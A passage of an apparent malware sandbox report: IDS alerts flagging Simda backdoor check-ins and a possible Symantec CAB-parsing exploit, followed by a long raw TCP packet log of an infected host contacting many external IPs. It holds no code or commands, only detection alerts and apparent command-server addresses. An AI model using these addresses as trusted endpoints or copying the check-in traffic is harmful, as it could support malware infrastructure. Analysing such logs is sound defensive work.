                                                                                                                                                                                                            2024-11-11T18:08:29.523610+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96262475.2.71.19980TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.525711+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96262644.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.548220+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962627208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:29.794161+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962628188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:08:30.745031+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962610208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:30.801922+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.962630TCP
                                                                                                                                                                                                            2024-11-11T18:08:30.992307+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962609154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:08:31.100389+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96263423.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:33.742282+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962612178.162.203.21180TCP
                                                                                                                                                                                                            2024-11-11T18:08:33.983455+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96263744.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:33.987395+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96263875.2.71.19980TCP
                                                                                                                                                                                                            2024-11-11T18:08:34.313180+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96264444.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:08:34.358121+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96264523.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:08:34.656395+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962617178.162.203.21180TCP
                                                                                                                                                                                                            2024-11-11T18:08:36.740328+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9626483.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:08:37.395138+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962650199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:08:43.540877+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962658178.162.203.21180TCP
                                                                                                                                                                                                            2024-11-11T18:08:43.858147+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962667199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:08:43.858329+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962643208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:08:50.600526+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.962366178.162.203.21180TCP

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.684077024 CET5686080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.688987017 CET80568603.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.689048052 CET5686080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.709790945 CET5686080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:37.714643002 CET80568603.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.071791887 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.076622009 CET805686123.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.076720953 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.103235960 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.104372978 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.105118990 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.108051062 CET805686123.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.109267950 CET805686499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.109410048 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.109842062 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.109890938 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.110194921 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.110460043 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.115001917 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.115286112 CET805686499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.142407894 CET80568603.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.142479897 CET5686080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.149523020 CET80568603.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.149597883 CET5686080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.181790113 CET5686080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.186822891 CET80568603.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.340137005 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.346100092 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.346312046 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.346312046 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.351130009 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.385200977 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.389784098 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.390103102 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.390163898 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.390280008 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.394764900 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.395071030 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.395328045 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.395880938 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.401926041 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.427367926 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.432348013 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.432466984 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.432598114 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.436217070 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.437614918 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.441232920 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.441320896 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.441463947 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.446459055 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.458241940 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.464454889 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.464534998 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.464807034 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.469613075 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533425093 CET805686123.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533436060 CET805686123.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533488989 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.533505917 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.534485102 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.534528971 CET5686180192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535010099 CET805686499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535087109 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535192966 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535551071 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.539752960 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.539777040 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.539832115 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.540601015 CET805687523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.540683985 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.540798903 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.540864944 CET805686499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.541017056 CET5686480192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.545918941 CET805687523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.554245949 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.554256916 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.773797035 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.775166035 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.781763077 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.781821012 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.803682089 CET5686980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.808840990 CET805686918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.812273026 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.813586950 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.821355104 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.823175907 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.828866959 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.829802990 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.830867052 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.831305027 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.839762926 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.839833021 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.877521992 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.878019094 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.907919884 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.908207893 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.908217907 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.908272028 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.909487963 CET5687080192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.914376020 CET805687044.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.016473055 CET805687523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.016578913 CET805687523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.016661882 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.028354883 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.028446913 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.029694080 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.029732943 CET5687580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.115469933 CET5687180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.120367050 CET805687144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.162713051 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.162760973 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.162858009 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.163578987 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.163589001 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.500143051 CET5688380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.500634909 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.505090952 CET805688385.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.505183935 CET5688380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.505973101 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.506505966 CET5688380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.506578922 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.511406898 CET805688385.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.512468100 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.512547970 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.512661934 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.517445087 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.550664902 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.550697088 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.551059961 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.551132917 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.555689096 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.597771883 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.597851992 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.599332094 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.602451086 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.602459908 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.602713108 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.602766991 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.603194952 CET8056872208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.603245974 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.603333950 CET5687280192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.643341064 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.811768055 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.811805010 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.811831951 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.811866045 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.811882973 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.811903000 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.811943054 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.811980009 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.812555075 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.812598944 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.892954111 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.893032074 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.893810034 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.893872023 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895123959 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895133018 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895168066 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895183086 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895206928 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895221949 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895284891 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895293951 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895529985 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.895979881 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.896030903 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.915071011 CET805688385.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.915128946 CET5688380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.915239096 CET5688380192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.917519093 CET5688880192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.920958042 CET805688385.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.922389030 CET805688885.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.922486067 CET5688880192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.922681093 CET5688880192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.928147078 CET805688885.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.974328995 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.974368095 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.974406958 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.974431992 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.974455118 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.974471092 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.975121021 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.975162029 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.975178957 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.975189924 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.975203991 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.975224972 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.975231886 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.975249052 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.975285053 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.976429939 CET56876443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.976444006 CET4435687699.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.989993095 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990035057 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990046024 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990050077 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990080118 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990086079 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990092039 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990106106 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990127087 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990135908 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990153074 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990164042 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990175009 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990201950 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990231037 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990242958 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.990283012 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.995042086 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.995104074 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.995137930 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.995151043 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.995165110 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.995182037 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.995218039 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071167946 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071183920 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071249008 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071288109 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071356058 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071367979 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071382046 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071387053 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071402073 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071432114 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071846962 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071902990 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071924925 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071938992 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071950912 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071964025 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071964025 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.071980953 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072000980 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072664022 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072724104 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072726965 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072737932 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072758913 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072783947 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072804928 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072818041 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.072859049 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.073559046 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.073580980 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.073595047 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.073613882 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.073617935 CET5687380192.168.2.9199.191.50.83
